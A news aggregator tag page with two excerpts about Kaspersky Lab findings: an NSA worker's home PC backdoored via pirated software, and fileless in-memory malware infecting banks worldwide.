Tag: moscow-based

Worker who snuck NSA malware home had his PC backdoored, Kaspersky says

Enlarge (credit: Kaspersky Lab) An NSA worker who reportedly snuck classified materials out of the agency stored them on a home computer that was later infected by a malicious backdoor that allowed third-parties to remotely access the machine, officials with Moscow-based antivirus provider Kaspersky Lab said. The NSA worker—described in some published reports as a contractor and in others as an employee—installed the backdoor after Kaspersky AV had first detected never-before-seen NSA malware samples on his computer. The backdoor was part of a pirated software package that the worker downloaded and installed. To run the pirated software, he first had to disable the AV program on his computer. After being infected, the worker re-enabled the AV program and scanned his computer multiple times, resulting in Kaspersky developing detections for new and unknown variants of the NSA malware. The NSA worker’s computer ran a home version of Kaspersky AV that had enabled a voluntary service known as Kaspersky Security Network . When turned on, KSN automatically uploads new and previously unknown malware to company Kaspersky Lab servers. The setting eventually caused the previously undetected NSA malware to be uploaded to Kaspersky Lab servers, where it was then reviewed by a company analyst. Read 9 remaining paragraphs | Comments

View article:
Worker who snuck NSA malware home had his PC backdoored, Kaspersky says

A rash of invisible, fileless malware is infecting banks around the globe

(credit: INVISIBLE-MAN_1933_James Whale) Two years ago, researchers at Moscow-based Kaspersky Lab discovered their corporate network was infected with malware that was unlike anything they had ever seen . Virtually all of the malware resided solely in the memory of the compromised computers, a feat that had allowed the infection to remain undetected for six months or more. Kaspersky eventually unearthed evidence that Duqu 2.0, as the never-before-seen malware was dubbed, was derived from Stuxnet, the highly sophisticated computer worm reportedly created by the US and Israel to sabotage Iran’s nuclear program. Now, fileless malware is going mainstream, as financially motivated criminal hackers mimic their nation-sponsored counterparts. According to research Kaspersky Lab plas to publish Wednesday, networks belonging to at least 140 banks and other enterprises have been infected by malware that relies on the same in-memory design to remain nearly invisible. Because infections are so hard to spot, the actual number is likely much higher. Another trait that makes the infections hard to detect is the use of legitimate and widely used system administrative and security tools—including PowerShell , Metasploit , and Mimikatz —to inject the malware into computer memory. “What’s interesting here is that these attacks are ongoing globally against banks themselves,” Kaspersky Lab expert Kurt Baumgartner told Ars. “The banks have not been adequately prepared in many cases to deal with this.” He went on to say that people behind the attacks are “pushing money out of the banks from within the banks,” by targeting computers that run automatic teller machines. Read 5 remaining paragraphs | Comments

Read the article:
A rash of invisible, fileless malware is infecting banks around the globe